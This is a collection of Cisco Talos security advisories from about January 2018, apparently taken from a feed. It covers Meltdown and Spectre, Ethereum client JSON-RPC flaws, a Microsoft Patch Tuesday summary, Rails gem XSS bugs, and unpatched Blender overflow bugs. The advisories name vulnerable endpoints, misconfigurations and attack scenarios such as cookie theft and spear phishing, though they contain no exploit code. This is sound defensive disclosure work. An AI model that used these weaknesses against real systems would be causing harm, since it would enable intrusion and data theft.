Cisco Talos is aware of three new vulnerabilities impacting Intel, AMD, Qualcomm and ARM processors used by almost all computers. We are investigating these issues and although we have not observed exploitation of these vulnerabilities in the wild, that does not mean that it has not occurred. We have observed publicly available proof of concept exploit code being developed to exploit these vulnerabilities.

These issues have been assigned the following CVE entries:

    Meltdown: An attacker can access kernel memory from user space
        Spectre: An attacker can read memory contents from other users' running programs

            These issues involve side channel and cache attacks that enable an attacker to steal sensitive information from memory space they should not be able to normally access. Google Project Zero published a blog providing technical details regarding these vulnerabilities. An example attack scenario would be an attacker stealing credentials from the memory space of another process. Two criteria must be met in order for these vulnerabilities to be exploited.
              1. The device being targeted must utilize an affected Intel, AMD, Qualcomm, or ARM processor (most processors from the last 10+ years fall into the category of "vulnerable").
              2. An attacker must be able to execute their own code (this includes Javascript) on the device. Depending on the vulnerability, the code may be executed as unprivileged code, or in others, as privileged ("root" or "SYSTEM") code.
                 There are three likely scenarios where attackers may attempt to leverage these vulnerabilities.
                1. Spectre could be leveraged to launch attacks against virtualized hosting environments. Given that it is possible to read host memory from within a guest, this could result in an attacker gaining access to the host OS. This sort of attack scenario mainly impacts cloud hosting providers such as Amazon, Azure, Google, etc. These providers are working to ensure customers are not impacted by these vulnerabilities. Check with your specific hosting provider for additional details. It is important to note that successfully exploiting these vulnerabilities in this scenario is not trivial.
                2. It is important to note that Spectre is accessible from within the web browser on affected devices which could allow malicious web sites to read arbitrary data from other browser tabs. Mozilla has confirmed this on their blog here. This could allow a remote attacker to obtain sensitive information, such as session or cookie data for other active sessions. It is important to note that this sort of an attack would likely only work under specific conditions. This attack would also require an attacker to convince a user to visit a malicious website in order to execute the code required to steal data.
                3. Meltdown could enable attackers to exploit additional vulnerabilities more easily. Meltdown allows for the defeating of Kernel Address Space Randomization (KASLR). This means that any vulnerability that wasn't previously exploitable due to KASLR is now potentially exploitable if chained together with Meltdown. This would be specific to the vulnerability the attacker is attempting to leverage, but from an attacker perspective it does remove some of the hurdles and problems encountered during the creation of their exploits.
                  As with all vulnerabilities, applying published patches is a crucial step to preventing an attacker from successfully exploiting these vulnerabilities. Microsoft, Linux and Apple have released patches for Meltdown. Other affected products are listed here. Applying the Microsoft patch may result in incompatibility issues with existing security software running on your system. To verify your patch status you can use the PowerShell modules provided by Microsoft. For affected Cisco devices please refer to the PSIRT advisory. Currently no patches are available for Spectre. As soon as Operating System patches are available for Spectre, we recommend that you apply them to your system as soon as possible.

                  As with all attacks, it is also critical that the initial infection vector be blocked whenever possible as each of these vulnerabilities require an attacker to be able to execute code on an affected system.

                  Some examples of blocking the initial vector include:

                  1. Using ad blocking and script disabling software can minimize the risk of Javascript-based browser attacks.
                  2. Cisco Umbrella can be used to block access to known malicious sites that may be launching attacks targeting these vulnerabilities.
                  3. Web Security Appliance (WSA) can be used to block access to known malicious sites.
                  4. FirePower NGFW can be used to block network based attacks leveraging these vulnerabilities.
                  5. AMP for Endpoints and Networks can be used to block known droppers that may be used to infect systems with malware that leverages these vulnerabilities.
                  6. AMP's exploit prevention engine covers multiple techniques that would be used after a successful Meltdown or Spectre memory read, that would be necessary for gaining code execution.

                  Coverage


                  Snort SIDs: 45357-45368

                  AMP Compatibility is documented here. AMP's exploit prevention system is documented here.

                  These signatures cover the specific PoC's and sample code outlined in the Spectre and Meltdown whitepapers. While these signatures have the potential to detect variants, they may not work for all cases. We still recommended that affected organizations install the OS and firmware patches to protect against this class of attacks. Talos is continuing to monitor the situation and will provide updated information as soon as it is available.

                  Vulnerability Spotlight: Multiple Vulnerabilities in the CPP and Parity Ethereum Client

                  $
                  0
                  0
                  Vulnerabilities discovered by Marcin Noga of Cisco Talos.


                  Overview


                  Talos is disclosing the presence of multiple vulnerabilities in the CPP and the Parity Ethereum clients.

                  TALOS-2017-0503 / CVE-2017-14457 describes a denial of service vulnerability and potential memory leak in libevm. The function is not currently enabled in the default build. This vulnerability only affects nodes which have manually enabled it during build time.

                  TALOS-2017-0508 / CVE-2017-14460 is an overly permissive cross-domain (CORS) whitelist policy vulnerability in the Ethereum Parity client. It can lead to the leak of sensitive data about existing accounts, parity settings and network configurations, in addition to accounts and parity settings modifications, if certain APIs have been turned on.

                  Further on, TALOS-2017-0464 - TALOS-2017-0471 / CVE-2017-12112 - CVE-2017-12119 describe multiple Authorization Bypass Vulnerabilities which an attacker could misuse to access functionality reserved only for users with administrative privileges without any credentials.

                  Finally, Talos found TALOS-2017-0471 / CVE-2017-12119, another denial of service vulnerabilities in the CPP-Ethereum JSON-RPC implementation. A specially crafted json request can cause an unhandled exception resulting in a denial of service.


                  Table 1 gives a brief overview of important security related JSON-RPC implementation details of the different Ethereum clients. Two of three clients are using sub-optimal implementations of the JSON-RPC interface. This leads to the serious security flaws which we are describing in detail below.

                  Table 1

                  *Cross Origin Resource Sharing


                  Details


                  TALOS-2017-0503 / CVE-2017-14457

                  Improper handling of smart contract code in the create2 opcode handler can lead to a denial of service. An attacker could hand over a huge amount of data to the SHA1 function which would take a long time for computation. The vulnerability can be used to perform a denial of service attack on all nodes in the Ethereum network using this implementation of the virtual machine library function. It is also a potential memory leak, because read out of bound data is returned to the attacker as a contract address. This function is not enabled by default, it has to be enabled by running ethvm with the -network Constantinople switch. More details can be found in the Talos vulnerability report.

                  TALOS-2017-0508 / CVE-2017-14460

                  Parity is a Rust based Ethereum client and one of the three most popular clients for the ethereum platform. It provides a rich JSON-RPC interface. This interface is turned on by default and exposes significant numbers of APIs. It comes with an overly permissive cross-domain (CORS) whitelist policy, which by default is set to '*'. Users running the Parity wallet visiting malicious websites are exposed to exploitation of this JSON-RPC daemon misconfiguration. This can lead to the leak of sensitive data about existing accounts, parity settings, network configurations, and to accounts’ and parity settings modifications if certain APIs has been turned on. More details can be found in the Talos vulnerability report.

                  TALOS-2017-0464 - TALOS-2017-0470 / CVE-2017-12112 - CVE-2017-12118

                  Improper authorization vulnerabilities exist in different CPP Ethereum API in their JSON-RPC implementation. An attacker can send a malicious JSON request which can be used to access restricted functionalities in the following CPP Ethereum API, resulting in authorization bypass.

                  TALOS-2017-0464 - admin_addPeer
                  TALOS-2017-0465 - admin_nodeInfo
                  TALOS-2017-0466 - admin_peers
                  TALOS-2017-0467 - miner_setEtherbase
                  TALOS-2017-0468 - miner_setGasPrice
                  TALOS-2017-0469 - miner_start
                  TALOS-2017-0470 - miner_stop

                  This may enable a remote attacker to access functionality reserved only for users with administrative privileges without the need for using any credentials. This is especially critical, because the interface is bound to 0.0.0.0 (all available IP addresses) and exposed to the world. The Content-Type should be set to ‘application/json’ while sending requests, but this requirement is not enforced. This means that even if the JSON-RPC daemon is running on a machine behind a NAT gateway, the JSON-RPC API can still be easily exploited by CSRF or SSRF attacks.

                  More details can be found in the Talos vulnerability report linked above.

                  TALOS-2017-0471 / CVE-2017-12119

                  Another denial of service vulnerability was found in the JSON-RPC server implementation of the CPP Ethereum client. Due to the lack of proper exception handling in some of the API an attacker may be able to send a malformed JSON package in order to crash the client/node. More details can be found in the Talos vulnerability report.


                  Coverage

                  Talos recommends Endpoint Security products such as Advanced Malware Protection(AMP) to mitigate client side exploitation of these vulnerabilities.

                  The following Snort Rules will detect exploitation attempts of some of these vulnerabilities. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org

                  Snort rules: 44707-44712, 44713

                  Microsoft Patch Tuesday - January 2018

                  $
                  0
                  0
                  Today Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 56 new vulnerabilities with 16 of them rated critical, 39 of them rated important and 1 of them rated Moderate. These vulnerabilities impact ASP.NET, Edge, Internet Explorer, Office, Windows, and more.

                  In addition to the 56 vulnerabilities addressed, Microsoft has also released an update that addresses Meltdown and Spectre. Mitigations for these two vulnerabilities were published for Windows in ADV180002. Note that due to incompatibilities with anti-virus products, users and organizations may not have received this update yet. For more information, users should refer to Microsoft's knowledge base article which covers this issue.


                  Vulnerabilities Rated Critical


                  Microsoft has assigned the following vulnerabilities a Critical severity rating:
                  • CVE-2018-0758 - Scripting Engine Memory Corruption Vulnerability
                  • CVE-2018-0762 - Scripting Engine Memory Corruption Vulnerability
                  • CVE-2018-0767 - Scripting Engine Information Disclosure Vulnerability
                  • CVE-2018-0769 - Scripting Engine Memory Corruption Vulnerability
                  • CVE-2018-0770 - Scripting Engine Memory Corruption Vulnerability
                  • CVE-2018-0772 - Scripting Engine Memory Corruption Vulnerability
                  • CVE-2018-0773 - Scripting Engine Memory Corruption Vulnerability
                  • CVE-2018-0774 - Scripting Engine Memory Corruption Vulnerability
                  • CVE-2018-0775 - Scripting Engine Memory Corruption Vulnerability
                  • CVE-2018-0776 - Scripting Engine Memory Corruption Vulnerability
                  • CVE-2018-0777 - Scripting Engine Memory Corruption Vulnerability
                  • CVE-2018-0778 - Scripting Engine Memory Corruption Vulnerability
                  • CVE-2018-0780 - Scripting Engine Information Disclosure Vulnerability
                  • CVE-2018-0781 - Scripting Engine Memory Corruption Vulnerability
                  • CVE-2018-0797 - Microsoft Word Memory Corruption Vulnerability
                  • CVE-2018-0800 - Scripting Engine Information Disclosure Vulnerability
                  The following is a brief description of each vulnerability.

                  Multiple CVEs - Scripting Engine Memory Corruption Vulnerability


                  Multiple remote code execution vulnerabilities have been discovered that affect Microsoft Edge and Internet Explorer. These vulnerabilities manifest due to Internet Explorer and Edge not properly handling objects in memory. Successful exploitation of these vulnerabilities could result in an attacker obtaining the ability to execute code within the context of the current user. Scenarios where these vulnerabilities would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit this vulnerability or, in some cases, opens a Microsoft Office document that utilizes the browser rendering engine.

                  The following is a list of CVEs related to these vulnerabilities.
                  • CVE-2018-0758
                  • CVE-2018-0762
                  • CVE-2018-0769
                  • CVE-2018-0770
                  • CVE-2018-0772
                  • CVE-2018-0773
                  • CVE-2018-0774
                  • CVE-2018-0775
                  • CVE-2018-0776
                  • CVE-2018-0777
                  • CVE-2018-0778
                  • CVE-2018-0781

                  Multiple CVEs - Scripting Engine Information Disclosure Vulnerability


                  Two information disclosure vulnerabilities have been discovered that affect Microsoft Edge. These vulnerabilities manifests due to Microsoft Edge not properly handling objects in memory. These vulnerabilities could be leveraged by an attacker to obtain sensitive information from an affected system. This information could then be utilized to launch additional attacks against the system. Scenarios where these vulnerabilities would like be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit this vulnerability.

                  The following is a list of CVEs related to these vulnerabilities.
                  • CVE-2018-0767
                  • CVE-2018-0780
                  • CVE-2018-0800

                  CVE-2018-0797 - Microsoft Word Memory Corruption Vulnerability


                  A remote code execution vulnerability has been discovered that affects Microsoft Office. This vulnerability manifests due to Microsoft Office failing to properly handle RTF files. Successful exploitation of this vulnerability could result in an attacker gaining the ability to execute code within the context of the current user. Scenarios where this vulnerability would likely be exploited include web-based attacks where the user navigates to a malicious web page containing a specially crafted RTF file or in email-based attacks where the user opens a specially crafted file that has been received as an email attachment.

                  Vulnerabilities Rated Important


                  Microsoft has assigned the following vulnerabilities an Important severity rating:
                  • CVE-2018-0741 - Microsoft Color Management Information Disclosure Vulnerability
                  • CVE-2018-0743 - Windows Subsystem for Linux Elevation of Privilege Vulnerability
                  • CVE-2018-0744 - Windows Elevation of Privilege Vulnerability
                  • CVE-2018-0745 - Windows Information Disclosure Vulnerability
                  • CVE-2018-0746 - Windows Information Disclosure Vulnerability
                  • CVE-2018-0747 - Windows Information Disclosure Vulnerability
                  • CVE-2018-0748 - Windows Elevation of Privilege Vulnerability
                  • CVE-2018-0749 - SMB Server Elevation of Privilege Vulnerability
                  • CVE-2018-0750 - Windows GDI Information Disclosure Vulnerability
                  • CVE-2018-0751 - Windows Elevation of Privilege Vulnerability
                  • CVE-2018-0752 - Windows Elevation of Privilege Vulnerability
                  • CVE-2018-0753 - Windows IPSec Denial of Service Vulnerability
                  • CVE-2018-0754 - ATMFD.dll Information Disclosure Vulnerability
                  • CVE-2018-0764 - .NET and .NET Core Denial Of Service Vulnerability
                  • CVE-2018-0766 - Microsoft Edge Information Disclosure Vulnerability
                  • CVE-2018-0768 - Scripting Engine Memory Corruption Vulnerability
                  • CVE-2018-0784 - ASP.NET Core Elevation Of Privilege Vulnerability
                  • CVE-2018-0786 - .NET Security Feature Bypass Vulnerability
                  • CVE-2018-0788 - ATMFD.dll Information Disclosure Vulnerability
                  • CVE-2018-0789 - Microsoft Office Spoofing Vulnerability
                  • CVE-2018-0790 - Microsoft Office Information Disclosure Vulnerability
                  • CVE-2018-0791 - Microsoft Outlook Remote Code Execution Vulnerability
                  • CVE-2018-0792 - Microsoft Word Remote Code Execution
                  • CVE-2018-0793 - Microsoft Outlook Remote Code Execution
                  • CVE-2018-0794 - Microsoft Word Remote Code Execution
                  • CVE-2018-0795 - Microsoft Office Remote Code Execution
                  • CVE-2018-0796 - Microsoft Excel Remote Code Execution
                  • CVE-2018-0798 - Microsoft Word Memory Corruption Vulnerability
                  • CVE-2018-0799 - Microsoft Access Tampering Vulnerability
                  • CVE-2018-0801 - Microsoft Office Remote Code Execution Vulnerability
                  • CVE-2018-0802 - Microsoft Office Memory Corruption Vulnerability
                  • CVE-2018-0803 - Microsoft Edge Elevation of Privilege Vulnerability
                  • CVE-2018-0805 - Microsoft Word Remote Code Execution Vulnerability
                  • CVE-2018-0806 - Microsoft Word Remote Code Execution Vulnerability
                  • CVE-2018-0807 - Microsoft Word Remote Code Execution Vulnerability
                  • CVE-2018-0812 - Microsoft Word Memory Corruption Vulnerability
                  • CVE-2018-0818 - Scripting Engine Security Feature Bypass
                  • CVE-2018-0819 - Spoofing Vulnerability in Microsoft Office for MAC
                  The following is a brief description of each vulnerability:

                  CVE-2018-0741 - Microsoft Color Management Information Disclosure Vulnerability


                  An information disclosure vulnerability has been discovered affecting Microsoft Graphics Component. This vulnerability manifests due to the Color Management Module (ICM32.dll) not properly handling objects in memory. Successful exploitation of this vulnerability could provide an attacker with the information required to bypass Address Space Layout Randomization (ASLR). While this vulnerability does not provide code execution, it could make it easier to successfully exploit remote code execution vulnerabilities due to the ability of the attacker to bypass ASLR.

                  CVE-2018-0743 - Windows Subsystem for Linux Elevation of Privilege Vulnerability


                  A privilege escalation vulnerability has been discovered affecting Windows Subsystem for Linux. This vulnerability manifests due to an integer overflow present in Windows Subsystem for Linux. Successful exploitation of this vulnerability requires an authenticated local attacker to run a specially crafted program and could allow them to execute code with elevated privileges on affected systems.

                  CVE-2018-0744 - Windows Elevation of Privilege Vulnerability


                  A privilege escalation vulnerability has been discovered affecting the Windows Kernel. This vulnerability manifests due to the Windows kernel failing to properly handle objects in memory. Successful exploitation of this vulnerability requires an authenticated local attacker to run a specially crafted program and could allow them to execute code with elevated privileges on affected systems.

                  Multiple CVEs - Windows Information Disclosure Vulnerability


                  Multiple information disclosure vulnerabilities have been discovered affecting Windows kernel. Successful exploitation of these vulnerability could provide an attacker information required to bypass ASLR as they allows the retrieval of the memory address of kernel objects. Exploitation of these vulnerability would require an authenticated local attacker to run a specially crafted program.

                  The following is a list of CVEs related to these vulnerabilities.
                  • CVE-2018-0745
                  • CVE-2018-0746
                  • CVE-2018-0747

                  Multiple CVEs - Windows Elevation of Privilege Vulnerability


                  Multiple privilege escalation vulnerabilities have been discovered affecting the Windows kernel. These vulnerabilities manifests due to the Windows Kernel API failing to properly enforce permissions. Successful exploitation of these vulnerability would require an authenticated local attacker to execute a specially crafted program and could result in the attacker having the ability to impersonate processes, inject cross-process communications, or interrupt system functionality.

                  The following is a list of CVEs related to these vulnerabilities.
                  • CVE-2018-0748
                  • CVE-2018-0751
                  • CVE-2018-0752

                  CVE-2018-0749 - SMB Server Elevation of Privilege Vulnerability


                  A privilege escalation vulnerability has been discovered affecting Windows SMB Server. This vulnerability manifests when an attacker with valid credentials to authenticate to an affected system opens a specially crafted file locally using the SMB protocol. Successful exploitation of this vulnerability could allow an attacker to bypass certain security checks. An attacker must have valid credentials and be authenticated to the affected system.

                  CVE-2018-0750 - Windows GDI Information Disclosure Vulnerability


                  An information disclosure vulnerability has been discovered affecting Microsoft Graphics Component. This vulnerability manifests due to the Windows GDI component improperly disclosing kernel memory addresses. Successful exploitation of this vulnerability could result in an attacker obtaining sensitive information that could be used to further attack the system. In order to exploit this vulnerability an attacker need to log on to the affected system and execute a specially crafted program.

                  CVE-2018-0753 - Windows IPSec Denial of Service Vulnerability


                  A denial of service vulnerability has been discovered that affects IPSec. This vulnerability manifests due to Windows improperly handling objects in memory. Successful exploitation of this vulnerability could allow an attacker to cause a system to stop responding, preventing the system from being used by authorized users.

                  CVE-2018-0754 - ATMFD.dll Information Disclosure Vulnerability


                  An information disclosure vulnerability exists affecting Graphics Fonts. This vulnerability manifests due to the Adobe Type Manager Font Driver (ATMFD.dll) improperly handling objects in memory. Successful exploitation of this vulnerability could allow an attacker to obtain sensitive information that could be used to further attack affected systems. Scenarios where this vulnerability would likely be exploited include an attacker opening a document containing specially crafted fonts on an affected system.

                  CVE-2018-0764 - .NET and .NET Core Denial Of Service Vulnerability


                  A denial of service vulnerability has been discovered affecting the .NET Framework. This vulnerability manifests due to .NET and .NET core improperly processing XML documents. Successful exploitation of this vulnerability could cause a denial of service in an affected .NET application. This vulnerability could be exploited by an attacker by sending specially crafted requests to a vulnerable .NET or .NET core application.

                  CVE-2018-0766 - Microsoft Edge Information Disclosure Vulnerability


                  An information disclosure vulnerability have been identified that affects Microsoft Edge. This vulnerability manifests due to Microsoft Edge PDF reader improperly handling objects in memory. This vulnerability could be leveraged by an attacker to obtain information that could be used for subsequent attacks against an affected system. Scenarios where this vulnerability would likely be exploited include web-based attacks where the user navigates to a malicious PDF hosted on an attacker controlled website.

                  CVE-2018-0768 - Scripting Engine Memory Corruption Vulnerability


                  A remote code execution vulnerability have been discovered that affects Microsoft Edge and Internet Explorer. This vulnerability manifests due to Internet Explorer and Edge not properly handling objects in memory. Successful exploitation of this vulnerability could result in an attacker obtaining the ability to execute code within the context of the current user. Scenarios where this vulnerability would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit this vulnerability.

                  CVE-2018-0784 - ASP.NET Core Elevation Of Privilege Vulnerability


                  A vulnerability have been discovered in the ASP.NET Core that could allow a privilege escalation attack to occur. This vulnerability manifests when an ASP.NET Core web application, based on a vulnerable project template, incorrectly utilizes input without first sanitizing it. An attacker who exploits this vulnerability could perform content injection attacks and run scripts in the context of the current user. Exploitation of this vulnerability could be achieved in email-based attack scenarios or via other social engineering means where the user clicks on a specially crafted link.

                  CVE-2018-0786 - .NET Security Feature Bypass Vulnerability


                  A security feature bypass vulnerability in the Microsoft .NET Framework and .NET Core have been identified that could allow attackers to bypass certificate validation. This vulnerability manifests in the way certificates are handled where certificates marked invalid for specific use may still be used for that purpose.

                  CVE-2018-0788 - OpenType Font Driver Elevation of Privilege Vulnerability


                  A privilege escalation vulnerability has been discovered in the Windows Adobe OpenType Font Driver. This vulnerability manifests as a result of the library incorrectly handling objects in memory. Exploitation of this vulnerability could be achieved by running a specially crafted application that exploits this flaw.

                  Multiple CVEs - Microsoft SharePoint Cross Site Scripting Elevation of Privilege Vulnerability


                  Two cross-site scripting vulnerabilities have been identified in Microsoft Sharepoint that could allow an attacker to perform a privilege escalation attack. These vulnerabilities manifest as a result of improper input sanitization for specially crafted web requests. An attacker who exploits these vulnerabilities would be able to run scripts in the context of the affected user, allowing the attacker to read content or perform actions based on that user's permission.

                  The following is a list of CVEs related to these vulnerabilities.
                  • CVE-2018-0789
                  • CVE-2018-0790

                  Multiple CVEs - Microsoft Outlook Remote Code Execution Vulnerability


                  Two remote code execution vulnerabilities have been identified in Microsoft Outlook that could allow an attacker to execute arbitrary code of their choice on targeted hosts. These vulnerabilities manifest as a result of Microsoft Outlook incorrectly parsing specially crafted emails. An attacker who sends a user a specially crafted email and socially engineers them to open a specially crafted attachment in Outlook could exploit this vulnerability.

                  The following is a list of CVEs related to these vulnerabilities.
                  • CVE-2018-0791
                  • CVE-2018-0793

                  Multiple CVEs - Microsoft Word Remote Code Execution Vulnerability


                  Multiple arbitrary code execution vulnerabilities have been identified in Microsoft Word. These vulnerabilities manifest as a result of Microsoft Word incorrectly handing objects in memory. An attacker who exploits one of these vulnerabilities could execute arbitrary code of their choosing on targeted hosts. Scenarios where this could occur include email-based attacks or other scenarios involving social engineering where the attackers convince the user to open a specially crafted Word document.

                  The following is a list of CVEs related to these vulnerabilities.
                  • CVE-2018-0792
                  • CVE-2018-0794
                  • CVE-2018-0805
                  • CVE-2018-0806
                  • CVE-2018-0807
                  • CVE-2018-0812

                  CVE-2018-0796 - Microsoft Excel Remote Code Execution Vulnerability


                  An arbitrary code execution vulnerabilty have been identified in Microsoft Excel. This vulnerability manifests as a result of Microsoft Excel incorrectly handing objects in memory. An attacker who exploits this vulnerability could execute arbitrary code of their choosing on targeted hosts. Scenarios where this could occur include email-based attacks or other scenarios involving social engineering where the attackers convince the user to open a specially crafted Excel spreadsheet.

                  Multiple CVEs - Microsoft Office Memory Corruption Vulnerability


                  Multiple arbitrary code execution vulnerabilities have been identified in Microsoft Office. These vulnerabilities manifest as a result of Microsoft Office incorrectly handing objects in memory. An attacker who exploits one of these vulnerabilities could execute arbitrary code of their choosing on targeted hosts. Scenarios where this could occur include email-based attacks or other scenarios involving social engineering where the attackers convince the user to open a specially crafted Office file.

                  The following is a list of CVEs related to these vulnerabilities.
                  • CVE-2018-0795
                  • CVE-2018-0798
                  • CVE-2018-0801
                  • CVE-2018-0802

                  CVE-2018-0799 - Microsoft Access Tampering Vulnerability


                  A cross-site scripting vulnerability has been identified in Microsoft Access. This vulnerability manifests as a result of Microsoft Access incorrectly handling and sanitizing inputs to image fields editing within Design view. An attacker who exploits this vulnerability could execute arbitrary JavaScript in the context of the current user. An attacker could then read content or perform actions on behalf on the user on a remote site. Exploitation of this vulnerability could be achieved by opening a specially crafted Access file.

                  CVE-2018-0803 - Microsoft Edge Elevation of Privilege Vulnerability


                  A vulnerability in Microsoft Edge has been identified that could result in privilege escalation if exploited. This vulnerability manifests as a result of Edge incorrectly enforcing cross-domain policies. Successful exploitation could result in a user obtaining elevated privileges.

                  CVE-2018-0818 - Scripting Engine Security Feature Bypass


                  A security feature bypass vulnerability has been identified in Microsoft Chakra that could allow an attacker to bypass Control Flow Guard. An attacker could exploit this vulnerability by creating a specially crafted web page designed to exploit this vulnerability and convincing a user to visit the web page.

                  CVE-2018-0819 - Spoofing Vulnerability in Microsoft Office for Mac


                  A spoofing vulnerability in Microsoft Outlook for Mac has been discovered and manifests as a result of Outlook for Mac incorrectly handling the encoding and display of email addresses. As a result, antivirus and anti-spam scanning may not work as intended.

                  Vulnerabilities Rated Moderate


                  Microsoft has assigned the following vulnerabilities an Moderate severity rating:
                  • CVE-2018-0785 - ASP.NET Core Cross Site Request Forgery Vulnerability
                  The following is a brief description of this vulnerability:

                  CVE-2018-0785 - ASP.NET Core Cross Site Request Forgery Vulnerability


                  A Cross Site Request Forgery (CSRF) vulnerability has been discovered affecting ASP.NET Core web applications that were created using vulnerable project templates. Successful exploitation of this vulnerability could allow an attacker to modify recovery codes associated with accounts to which the attacker should not have access to, resulting in the user being locked out of their account in situations where the user attempts to access their account after losing their 2FA device.

                  Coverage


                  In response to these vulnerability disclosures, Talos is releasing the following Snort rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

                  Snort Rules:

                  • 45374-45379
                  • 45383-45384
                  • 45387-45392
                  • 45395-45396
                  • 45402-45403


                  Vulnerability Spotlight: Ruby Rails Gem XSS Vulnerabilities

                  $
                  0
                  0
                  Vulnerabilities discovered by Zachary Sanchez of Cisco ASIG

                  Overview


                  Talos has discovered two XSS vulnerabilities in Ruby Rails Gems. Rails is a Ruby framework designed to create web services or web pages. Ruby Gems is a package manager for distributing software packages as 'gems'. The two XSS vulnerabilities were discovered in two different gem packages: delayed_job_web and rails_admin.

                  Ruby is widely used as a language for web development. Gem packages allow software engineers to reuse code across multiple development projects. As such, the discovery of a vulnerability in a gem may mean that many different systems are affected by that vulnerability.



                  Details

                  TALOS-2017-0449 (CVE-2017-12097) - delayed_job_web rails gem XSS vulnerability

                  An exploitable XSS vulnerability exists in the filter functionality of the delayed_job_web rails gem version 1.4. A specially crafted URL can cause an XSS flaw resulting in an attacker being able to execute arbitrary javascript on the victim's browser. The vulnerability can be used to phish users or steal cookies from connected users.

                  More details can be found in the vulnerability report:

                  TALOS-2017-0449

                  TALOS-2017-0450 (CVE-2017-12098) - rails_admin rails gem XSS vulnerability

                  This is an additional exploitable XSS vulnerability that exists in the filter functionality of the rails_admin rails gem version 1.2.0. In the same way at the above vulnerability, a specially crafted URL can be used to execute arbitrary javascript to phish users or steal cookies.

                  More details can be found in the vulnerability report:

                  TALOS-2017-0450

                  Coverage


                  The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

                  Snort Rules: 44380, 44381

                  Vulnerability Spotlight: Multiple Unpatched Vulnerabilities in Blender Identified

                  $
                  0
                  0
                  Technology has evolved in incredible ways that has helped people to create and visualize media like never before. Today, people can use tools such as Blender to visualize, model, and animate 3D content, especially since it's free and open-source software. However, this also make it an attractive target for adversaries to audit and find vulnerabilities. Given the user base of Blender, exploiting these vulnerabilities to compromise a user could have a significant impact as attackers could use the foothold gained by attacking Blender to further compromise an organization's network.

                  Today, Talos is disclosing multiple vulnerabilities that have been identified in Blender. These vulnerabilities could allow an attacker to execute arbitrary code on an affected host running Blender. A user who opens a specially crafted file in Blender that is designed to trigger one of these vulnerabilities could be exploited and compromised.

                  Talos has responsibly disclosed these vulnerabilities to Blender in an attempt to ensure they are addressed. However, Blender has declined to address them stating that "fixing these issues one by one is also a waste of time." As a result, there currently is no software update that addresses these vulnerabilities. Additionally, Blender developers believe that "opening a file with Blender should be considered like opening a file with the Python interpreter, you have [to trust] the source it is coming from."

                  Attack Scenarios


                  The specific conditions required to exploit each of these vulnerabilities varies, but they generally require a user to open a supported file type in Blender on their local system. An attacker could weaponize these vulnerabilities and utilize social engineering tactics in conjunction with a spear phishing email to remotely exploit and compromise a targeted user. Other possible scenarios where attackers could exploit and compromise users include cases were malicious files are uploaded to sites like GitHub, Google Drive, and Dropbox for sharing with intended victims.

                  Talos has previously covered email-based attacks where adversaries sent highly targeted phishing emails to specific users running specific software to compromise them. Similar scenarios where an attacker sends targeted phishing emails to individuals within an organization that utilizes Blender is not outside the realm of possibility. This is especially true given how attackers utilize social engineering tactics to convince users to open files attached to emails, even when organizations are aware that attackers utilize this strategy.

                  Vulnerabilities Details


                  These vulnerabilities were identified by Cory Duplantis and another member of Talos.

                  Multiple vulnerabilities have been identified in Blender which could lead to arbitrary code execution. These vulnerabilities manifest as a result of improperly parsing and handling files in Blender, leading to multiple potential integer overflow or buffer overflow conditions. These vulnerabilities are listed below along with a brief description of the issue. For the full details of each of these vulnerabilities, please refer to each of the specific vulnerability advisories.
                  • TALOS-2017-0406 - Blender Sequencer imb_loadtiff Integer Overflow Code Execution Vulnerability
                    An integer overflow vulnerability in the .tiff file loading functionality of Blender.
                  • TALOS-2017-0407 - Blender Sequencer imb_loadpng Integer Overflow Code Execution Vulnerability
                    An integer overflow vulnerability in the .png file loading functionality of Blender.
                  • TALOS-2017-0408 - Blender Sequencer imb_loadiris Integer Overflow Code Execution Vulnerability
                    An integer overflow vulnerability in the .iris file loading functionality of Blender.
                  • TALOS-2017-0409 - Blender Sequencer dpxOpen Buffer Overflow Code Execution Vulnerability
                    An buffer overflow vulnerability in the .cin DPX loading functionality of Blender.
                  • TALOS-2017-0410 - Blender Sequencer imb_load_dpx_cineon Integer Overflow Code Execution Vulnerability
                    An integer overflow vulnerability in the .cin DPX loading functionality of Blender.
                  • TALOS-2017-0411 - Blender Sequencer imb_loadhdr Integer Overflow Code Execution Vulnerability
                    An integer overflow vulnerability in the .hdr RADIANCE loading functionality of Blender.
                  • TALOS-2017-0412 - Blender Sequencer imb_bmp_decode Integer Overflow Code Execution Vulnerability
                    An integer overflow vulnerability in the .bmp file loading functionality of Blender.
                  • TALOS-2017-0413 - Blender Sequencer imb_get_anim_type Streams Integer Overflow Code Execution Vulnerability
                    An integer overflow vulnerability in the animation playing functionality of .avi files in Blender.
                  • TALOS-2017-0414 - Blender Sequencer avi_format_convert Integer Overflow Code Execution Vulnerability
                    An integer overflow vulnerability in the animation playing functionality of .avi files in Blender.
                  • TALOS-2017-0415 - Blender Directory Browsing Thumbnail Viewer Integer Overflow Code Execution Vulnerability
                    An integer overflow vulnerability in the directory browser thumbnail viewer functionality of Blender.
                  • TALOS-2017-0425 - Blender BKE_image_acquire_ibuf Integer Overflow Code Execution Vulnerability
                    An integer overflow vulnerability in the image loading functionality of Blender.
                  • TALOS-2017-0433 - Blender vcol_to_fcol Integer Overflow Code Execution Vulnerability
                    An integer overflow vulnerability in the upgrade functionality of a legacy Mesh attribute within a .blend file.
                  • TALOS-2017-0434 - Blender Object CustomData_external_read Integer Overflow Code Execution Vulnerability.
                    An integer overflow vulnerability in the way Blender handles the `CustomData` layer from a `Mesh` object within .blend file.
                  • TALOS-2017-0438 - Blender BKE_mesh_calc_normals_tessface Integer Overflow Code Execution Vulnerability
                    An integer overflow vulnerability in the way Blender fixes the normals within a `Mesh` object when loading an older version of a .blend file.
                  • TALOS-2017-0451 - Blender customData_add_layer__internal Integer Overflow Code Execution Vulnerability
                    An integer overflow vulnerability in the upgrade functionality for the legacy Mesh attribute `tface`.
